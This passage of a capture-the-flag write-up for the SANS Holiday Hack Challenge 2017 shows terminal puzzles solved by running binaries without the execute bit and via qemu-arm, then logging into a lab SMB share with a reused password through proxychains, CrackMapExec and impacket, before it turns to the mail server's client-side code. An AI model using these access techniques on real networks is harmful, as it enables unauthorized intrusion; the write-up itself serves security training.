same trick as for the &lt;code&gt;find&lt;/code&gt; executable from &amp;quot;Winter Wonder Landing&amp;quot;,
because it involded using &lt;code&gt;chmod&lt;/code&gt; to mark our new program as executable.
We seem to be stuck in a &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Catch-22_(logic)"&gt;Catch-22 logic&lt;/a&gt;.
So, let's see how we can change our program's attributes, without relying on
&lt;code&gt;chmod&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;This &lt;a class="reference external" href="https://unix.stackexchange.com/a/83979"&gt;Stack Exchange answer&lt;/a&gt; gives
us several possibilities. I used the first one:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@cd14b3563680:~$&lt;/span&gt; cp /bin/ls ./CandyCaneStriper_from_ls
&lt;span class="gp"&gt;elf@cd14b3563680:~$&lt;/span&gt; cp ./CandyCaneStriper ./CandyCaneStriper_from_ls
&lt;span class="gp"&gt;elf@cd14b3563680:~$&lt;/span&gt; ls -lh CandyCaneStriper_from_ls
&lt;span class="go"&gt;-rwxr-xr-x 1 elf elf 45K Dec 23 18:57 CandyCaneStriper_from_ls&lt;/span&gt;
&lt;span class="gp"&gt;elf@cd14b3563680:~$&lt;/span&gt; ./CandyCaneStriper_from_ls
&lt;span class="go"&gt;                   _..._&lt;/span&gt;
&lt;span class="go"&gt;                 .&amp;#39;\\ //`,&lt;/span&gt;
&lt;span class="go"&gt;                /\\.&amp;#39;``&amp;#39;.=&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;               / \/     ;==|&lt;/span&gt;
&lt;span class="go"&gt;              /\\/    .&amp;#39;\`,`&lt;/span&gt;
&lt;span class="go"&gt;             / \/     `&amp;quot;&amp;quot;`&lt;/span&gt;
&lt;span class="go"&gt;            /\\/&lt;/span&gt;
&lt;span class="go"&gt;           /\\/&lt;/span&gt;
&lt;span class="go"&gt;          /\ /&lt;/span&gt;
&lt;span class="go"&gt;         /\\/&lt;/span&gt;
&lt;span class="go"&gt;        /`\/&lt;/span&gt;
&lt;span class="go"&gt;        \\/&lt;/span&gt;
&lt;span class="go"&gt;         `&lt;/span&gt;
&lt;span class="go"&gt;The candy cane striping machine is up and running!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="id5"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id31"&gt;Cranberry Pi: the &amp;quot;official&amp;quot; solution&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Having managed to execute the program, I decided to take a look at &lt;a class="reference external" href="https://twitter.com/GreenesterElf"&gt;Holly
Evergreen's Twitter profile&lt;/a&gt;. In &lt;a class="reference external" href="https://twitter.com/GreenesterElf/status/938544194070634496"&gt;this
tweet&lt;/a&gt;, she
points to a &lt;a class="reference external" href="https://superuser.com/questions/341439/can-i-execute-a-linux-binary-without-the-execute-permission-bit-being-set"&gt;Super User answer&lt;/a&gt;,
which explains how to execute a program that is not marked as executable.&lt;/p&gt;
&lt;p&gt;The accepted answer says that we can use the program linker/loader as an
interpreter. Let's give it a try:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@fea39a7c28e3:~$&lt;/span&gt; ls -lh ./CandyCaneStriper
&lt;span class="go"&gt;-rw-r--r-- 1 root root 45K Dec 15 19:59 ./CandyCaneStriper&lt;/span&gt;
&lt;span class="gp"&gt;elf@fea39a7c28e3:~$&lt;/span&gt; /lib/x86_64-linux-gnu/ld-2.23.so ./CandyCaneStriper
&lt;span class="go"&gt;                   _..._&lt;/span&gt;
&lt;span class="go"&gt;                 .&amp;#39;\\ //`,&lt;/span&gt;
&lt;span class="go"&gt;                /\\.&amp;#39;``&amp;#39;.=&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;               / \/     ;==|&lt;/span&gt;
&lt;span class="go"&gt;              /\\/    .&amp;#39;\`,`&lt;/span&gt;
&lt;span class="go"&gt;             / \/     `&amp;quot;&amp;quot;`&lt;/span&gt;
&lt;span class="go"&gt;            /\\/&lt;/span&gt;
&lt;span class="go"&gt;           /\\/&lt;/span&gt;
&lt;span class="go"&gt;          /\ /&lt;/span&gt;
&lt;span class="go"&gt;         /\\/&lt;/span&gt;
&lt;span class="go"&gt;        /`\/&lt;/span&gt;
&lt;span class="go"&gt;        \\/&lt;/span&gt;
&lt;span class="go"&gt;         `&lt;/span&gt;
&lt;span class="go"&gt;The candy cane striping machine is up and running!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;And it worked, indeed! TIL you can execute a program without it being marked
as executable.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="id6"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id32"&gt;Redirecting the snowball&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Since we managed to execute the program, we get a new tool: the Thermite, which
can melts the snowball, reduce its size, and thus modify its speed.&lt;/p&gt;
&lt;img alt="cryokinetic_magic_terminal.png" class="align-center" src="/images/sans-christmas-challenge-2017/cryokinetic_magic_terminal.png" /&gt;
&lt;p&gt;Now here's the layout I used to redirect the snowball:&lt;/p&gt;
&lt;img alt="cryokinetic_magic_snowball.gif" class="align-center" src="/images/sans-christmas-challenge-2017/cryokinetic_magic_snowball.gif" /&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="north-pole-christmas-town-infrastructure-smb-server"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id33"&gt;North Pole Christmas Town infrastructure: SMB server&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;If we take a look at the &lt;code&gt;nmap&lt;/code&gt; scan, we can see that a server called
&lt;code&gt;hhc17-smb-server.c.holidayhack2017.internal&lt;/code&gt;. This must be an SMB
server used to share some files. Let's try to connect to it using Alabaster
Snowball's credentials. To do this, I'm using &lt;code&gt;proxychains&lt;/code&gt;, and
&lt;a class="reference external" href="https://twitter.com/byt3bl33d3r"&gt;&amp;#64;byt3bl33d3r&lt;/a&gt;'s excellent
&lt;code&gt;CrackMapExec&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; proxychains cme &lt;span class="m"&gt;10&lt;/span&gt;.142.0.7 -u alabaster_snowball -p stream_unhappy_buy_loss --shares
&lt;span class="go"&gt;ProxyChains-3.1 (http://proxychains.sf.net)&lt;/span&gt;
&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.142.0.7:445-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;CME          10.142.0.7:445 HHC17-EMI       [*] Windows 10.0 Build 14393 (name:HHC17-EMI) (domain:HHC17-EMI)&lt;/span&gt;
&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.142.0.7:445-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.142.0.7:445-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;CME          10.142.0.7:445 HHC17-EMI       [+] HHC17-EMI\alabaster_snowball:stream_unhappy_buy_loss&lt;/span&gt;
&lt;span class="go"&gt;CME          10.142.0.7:445 HHC17-EMI       [+] Enumerating shares&lt;/span&gt;
&lt;span class="go"&gt;CME          10.142.0.7:445 HHC17-EMI       SHARE           Permissions&lt;/span&gt;
&lt;span class="go"&gt;CME          10.142.0.7:445 HHC17-EMI       -----           -----------&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;CME          10.142.0.7:445 HHC17-EMI       FileStor        READ&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;CME          10.142.0.7:445 HHC17-EMI       ADMIN$          NO ACCESS&lt;/span&gt;
&lt;span class="go"&gt;CME          10.142.0.7:445 HHC17-EMI       IPC$            READ&lt;/span&gt;
&lt;span class="go"&gt;CME          10.142.0.7:445 HHC17-EMI       C$              NO ACCESS&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hmm, we have read access to the &lt;code&gt;FileStor&lt;/code&gt; share. Let's connect to it.
I'm using &lt;a class="reference external" href="https://github.com/CoreSecurity/impacket"&gt;impacket&lt;/a&gt;'s
&lt;code&gt;smbclient.py&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; proxychains smbclient.py alabaster_snowball:stream_unhappy_buy_loss@10.142.0.7
&lt;span class="go"&gt;ProxyChains-3.1 (http://proxychains.sf.net)&lt;/span&gt;
&lt;span class="go"&gt;Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies&lt;/span&gt;

&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.142.0.7:445-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;Type help for list of commands&lt;/span&gt;
&lt;span class="gp"&gt;#&lt;/span&gt; use FileStor
&lt;span class="gp"&gt;#&lt;/span&gt; ls
&lt;span class="go"&gt;drw-rw-rw-          0  Mon Dec 25 05:09:11 2017 .&lt;/span&gt;
&lt;span class="go"&gt;drw-rw-rw-          0  Mon Dec 25 05:09:11 2017 ..&lt;/span&gt;
&lt;span class="go"&gt;-rw-rw-rw-     255520  Mon Dec 25 05:09:28 2017 BOLO - Munchkin Mole Report.docx&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;-rw-rw-rw-    1275756  Mon Dec  4 21:04:34 2017 GreatBookPage3.pdf&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;-rw-rw-rw-     133295  Wed Dec  6 22:47:47 2017 MEMO - Password Policy Reminder.docx&lt;/span&gt;
&lt;span class="go"&gt;-rw-rw-rw-      10245  Wed Dec  6 23:28:21 2017 Naughty and Nice List.csv&lt;/span&gt;
&lt;span class="go"&gt;-rw-rw-rw-      60344  Wed Dec  6 22:51:47 2017 Naughty and Nice List.docx&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Among other files that may be useful later, we find the &lt;a class="reference external" href="/docs/sans-christmas-challenge-2017/GreatBookPage3.pdf"&gt;third page to The
Great Book&lt;/a&gt;
(sha256: &lt;code&gt;6b99d47103d4030e643c8073dfab0915b0bf1a265c32035ec604148abd49d64e&lt;/code&gt;):&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The Great Schism&lt;/p&gt;
&lt;p&gt;Many centuries ago, the Little People of Oz were united - one people
sharing peace and laughter all the way. But then, tragedy struck - The
Great Schism split the community into two bitterly opposed factions: the
Munchkins and the Elves. The original cause of this acrimonious division
has long been forgotten.&lt;/p&gt;
&lt;p&gt;As The Great Schism escalated from verbal arguments to fist fights to the
rise of actual armed militias, the Wizard knew he had to act. He reached
out to his good friend, Santa Claus, who at the time was setting up a
worldwide gift distribution operation at the North Pole. To avoid the
near-certain bloodshed of an Oz-wide civil war, the Wizard and Santa agreed
that they would relocate the Elven faction to the North, where they would
help Santa manufacture presents and run the North Pole's infrastructure.
The Munchkins would remain in Oz, living as before, but viewing the Elves'
departure as a banishment. The Elves themselves regard their move as
a magnanimous and voluntary relocation to the North Pole, seeking refuge
from marauding Munchkins.&lt;/p&gt;
&lt;p&gt;Sadly, although violence between the Munchkins and the Elves was thwarted,
there remains a seething hatred between the two peoples. Despite the best
efforts of Santa and the Wizard of Oz, anti-Elf propaganda appears from
time to time in Oz, as does anti-Munchkin sentiment in the North Pole.
Indeed, the two peoples remain in a perpetual state of cold ward. Sadly,
the chilling after-affects of The Great Schism are felt to this very day.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="fourth-page-of-the-great-book"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id34"&gt;Fourth page of &lt;em&gt;The Great Book&lt;/em&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="north-pole-and-beyond-there-s-snow-place-like-home"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id35"&gt;North Pole and Beyond: There's Snow Place Like Home&lt;/a&gt;&lt;/h3&gt;
&lt;div class="section" id="cranberry-pi"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id36"&gt;Cranberry Pi&lt;/a&gt;&lt;/h4&gt;
&lt;pre class="literal-block"&gt;
                             ______
                          .-&amp;quot;&amp;quot;&amp;quot;&amp;quot;.._'.       _,##
                   _..__ |.-&amp;quot;&amp;quot;&amp;quot;-.|  |   _,##'`-._
                  (_____)||_____||  |_,##'`-._,##'`
                  _|   |.;-&amp;quot;&amp;quot;-.  |  |#'`-._,##'`
               _.;_ `--' `\    \ |.'`\._,##'`
              /.-.\ `\     |.-&amp;quot;;.`_, |##'`
              |\__/   | _..;__  |'-' /
              '.____.'_.-`)\--' /'-'`
               //||\\(_.-'_,'-'`
             (`-...-')_,##'`
      jgs _,##`-..,-;##`
       _,##'`-._,##'`
    _,##'`-._,##'`
      `-._,##'`
My name is Pepper Minstix, and I need your help with my plight.
I've crashed the Christmas toy train, for which I am quite contrite.
I should not have interfered, hacking it was foolish in hindsight.
If you can get it running again, I will reward you with a gift of delight.
&lt;/pre&gt;
&lt;p&gt;Alright, once again, we're supposed to execute a program. Let's see:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@36ff87294cc6:~$&lt;/span&gt; ls -lh
&lt;span class="go"&gt;total 444K&lt;/span&gt;
&lt;span class="go"&gt;-rwxr-xr-x 1 root root 444K Dec  7 18:43 trainstartup&lt;/span&gt;
&lt;span class="gp"&gt;elf@a6b0a5dfef57:~$&lt;/span&gt; ./trainstartup
&lt;span class="go"&gt;bash: ./trainstartup: cannot execute binary file: Exec format error&lt;/span&gt;
&lt;span class="gp"&gt;elf@a6b0a5dfef57:~$&lt;/span&gt; file ./trainstartup
&lt;span class="go"&gt;./trainstartup: ELF 32-bit LSB  executable, ARM, EABI5 version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=005de4685e8563d10b3de3e0be7d6fdd7ed732eb, not stripped&lt;/span&gt;
&lt;span class="gp"&gt;elf@a6b0a5dfef57:~$&lt;/span&gt; uname -a
&lt;span class="go"&gt;Linux a6b0a5dfef57 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3 (2017-12-03) x86_64 x86_64 x86_64 GNU/Linux&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hmm, just like for the &lt;code&gt;find&lt;/code&gt; executable in &amp;quot;Winter Wonder Landing&amp;quot;,
we're stuck with an ARM program, while we're running on an Intel x64 processor.
However, we can't replace this program with an x64 version, since it's a
custom program! We must find a way to execute ARM on an Intel x64 processor.&lt;/p&gt;
&lt;p&gt;This usually means that we have to use some kind of virtualization solution.
One virtualization solution that works in CLI, and can launch program
independently, without having to virtualize a whole OS is QEMU. Let's see if
the machine has QEMU:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@a6b0a5dfef57:~$&lt;/span&gt; find / -name &lt;span class="s1"&gt;&amp;#39;qemu*&amp;#39;&lt;/span&gt; &lt;span class="m"&gt;2&lt;/span&gt;&amp;gt; /dev/null
&lt;span class="hll"&gt;&lt;span class="go"&gt;/usr/bin/qemu-arm&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;/usr/bin/qemu-alpha&lt;/span&gt;
&lt;span class="go"&gt;/usr/bin/qemu-sh4eb&lt;/span&gt;
&lt;span class="go"&gt;/usr/bin/qemu-mips&lt;/span&gt;
&lt;span class="go"&gt;/usr/bin/qemu-aarch64&lt;/span&gt;
&lt;span class="go"&gt;/usr/bin/qemu-sparc32plus&lt;/span&gt;
&lt;span class="go"&gt;/usr/bin/qemu-m68k&lt;/span&gt;
&lt;span class="go"&gt;/usr/bin/qemu-microblazeel&lt;/span&gt;
&lt;span class="go"&gt;/usr/bin/qemu-ppc64&lt;/span&gt;
&lt;span class="go"&gt;/usr/bin/qemu-mipsn32&lt;/span&gt;
&lt;span class="go"&gt;/usr/bin/qemu-microblaze&lt;/span&gt;
&lt;span class="go"&gt;/usr/bin/qemu-mips64&lt;/span&gt;
&lt;span class="go"&gt;/usr/bin/qemu-sparc64&lt;/span&gt;
&lt;span class="go"&gt;/usr/bin/qemu-s390x&lt;/span&gt;
&lt;span class="go"&gt;/usr/bin/qemu-mips64el&lt;/span&gt;
&lt;span class="go"&gt;/usr/bin/qemu-mipsel&lt;/span&gt;
&lt;span class="go"&gt;/usr/bin/qemu-cris&lt;/span&gt;
&lt;span class="go"&gt;/usr/bin/qemu-armeb&lt;/span&gt;
&lt;span class="go"&gt;/usr/bin/qemu-sparc&lt;/span&gt;
&lt;span class="go"&gt;/usr/bin/qemu-unicore32&lt;/span&gt;
&lt;span class="go"&gt;/usr/bin/qemu-x86_64&lt;/span&gt;
&lt;span class="go"&gt;/usr/bin/qemu-mipsn32el&lt;/span&gt;
&lt;span class="go"&gt;/usr/bin/qemu-ppc64abi32&lt;/span&gt;
&lt;span class="go"&gt;/usr/bin/qemu-sh4&lt;/span&gt;
&lt;span class="go"&gt;/usr/bin/qemu-i386&lt;/span&gt;
&lt;span class="go"&gt;/usr/bin/qemu-ppc&lt;/span&gt;
&lt;span class="go"&gt;/usr/bin/qemu-or32&lt;/span&gt;
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Yes, &lt;code&gt;qemu-arm&lt;/code&gt; is present, we can try and launch our program:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@a6b0a5dfef57:~$&lt;/span&gt; /usr/bin/qemu-arm ./trainstartup
&lt;span class="go"&gt;Starting up...&lt;/span&gt;

&lt;span class="go"&gt;    Merry Christmas&lt;/span&gt;
&lt;span class="go"&gt;    Merry Christmas&lt;/span&gt;
&lt;span class="go"&gt;v&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt;*&amp;lt;
&lt;span class="go"&gt;^&lt;/span&gt;
&lt;span class="go"&gt;/o\&lt;/span&gt;
&lt;span class="go"&gt;/   \               @.·&lt;/span&gt;
&lt;span class="go"&gt;/~~   \                .&lt;/span&gt;
&lt;span class="go"&gt;/ ° ~~  \         · .&lt;/span&gt;
&lt;span class="go"&gt;/      ~~ \       ◆  ·&lt;/span&gt;
&lt;span class="go"&gt;/     °   ~~\    ·     0&lt;/span&gt;
&lt;span class="go"&gt;/~~           \   .─··─ · o&lt;/span&gt;
&lt;span class="go"&gt;             /°  ~~  .*· · . \  ├──┼──┤&lt;/span&gt;
&lt;span class="go"&gt;              │  ──┬─°─┬─°─°─°─ └──┴──┘&lt;/span&gt;
&lt;span class="go"&gt;≠==≠==≠==≠==──┼──=≠     ≠=≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠===≠&lt;/span&gt;
&lt;span class="go"&gt;              │   /└───┘\┌───┐       ┌┐&lt;/span&gt;
&lt;span class="go"&gt;                         └───┘    /▒▒▒▒&lt;/span&gt;
&lt;span class="go"&gt;≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠=°≠=°≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠&lt;/span&gt;
&lt;span class="go"&gt;You did it! Thank you!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="id7"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id37"&gt;Redirecting the snowball&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Since we managed to execute the program, we're given an object: Jam, which
does... something? I dunno, but apparently it should not be confused with
reindeer droppings.&lt;/p&gt;
&lt;img alt="there_s_snow_place_like_home_terminal.png" class="align-center" src="/images/sans-christmas-challenge-2017/there_s_snow_place_like_home_terminal.png" /&gt;
&lt;p&gt;Now here's the layout I used to redirect the snowball:&lt;/p&gt;
&lt;img alt="there_s_snow_place_like_home_snowball.gif" class="align-center" src="/images/sans-christmas-challenge-2017/there_s_snow_place_like_home_snowball.gif" /&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="north-pole-christmas-town-infrastructure-elf-web-access"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id38"&gt;North Pole Christmas Town infrastructure: Elf Web Access&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;If we take another look at the &lt;code&gt;nmap&lt;/code&gt; scan result, we can find a server
called &lt;code&gt;mail.northpolechristmastown.com&lt;/code&gt;. This is obviously the North
Pole mail server. Let's see what we can find.&lt;/p&gt;
&lt;p&gt;If we try to connect with Alabaster's password, we get an &lt;code&gt;Incorrect
password&lt;/code&gt; message. Great, the guy reuses his password for his MySQL account,
his system account, and his SMB account, but not his mail account. Let's find
another way.&lt;/p&gt;
&lt;img alt="ewa_failed_login.png" class="align-center" src="/images/sans-christmas-challenge-2017/ewa_failed_login.png" /&gt;
&lt;p&gt;After trying to bypass authentication for quite some time, I decided to go
back to basic recon. By looking at the source code of the application, we
find a reference to a webpage called &lt;code&gt;account.html&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c1"&gt;// File custom.js&lt;/span&gt;
&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nx"&gt;login&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;address&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;$&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;#email&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;val&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nx"&gt;trim&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;passw&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;$&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;#password&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;val&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nx"&gt;trim&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;address&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nx"&gt;passw&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nx"&gt;address&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;match&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sr"&gt;/[\w\_\-\.]+\@[\w\_\-\.]+\.\w\w\w?\w?/g&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;!==&lt;/span&gt; &lt;span class="kc"&gt;null&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nx"&gt;$&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;post&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;login.js&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;email&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;address&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;password&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;passw&lt;/span&gt; &lt;span class="p"&gt;}).&lt;/span&gt;&lt;span class="nx"&gt;done&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="nx"&gt;result&lt;/span&gt; &lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="c1"&gt;//RETURN A JSON bool value of true if the email and password is correct. false if incorrect&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="nx"&gt;$&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;#email&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;val&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
                &lt;span class="nx"&gt;$&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;#password&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;val&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
                &lt;span class="nx"&gt;Materialize&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;toast&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Correct. Logging in now!&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;4000&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
                &lt;span class="nx"&gt;setTimeout&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(){&lt;/span&gt;
                    &lt;span class="c1"&gt;//redirect to home.html. This needs to be locked down by cookies!&lt;/span&gt;
&lt;span class="hll"&gt;                    &lt;span class="nb"&gt;window&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;location&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;href&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;account.html&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;                &lt;span class="p"&gt;},&lt;/span&gt; &lt;span class="mi"&gt;1000&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="nx"&gt;Materialize&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;toast&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;result&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;4000&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="p"&gt;}).&lt;/span&gt;&lt;span class="nx"&gt;fail&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
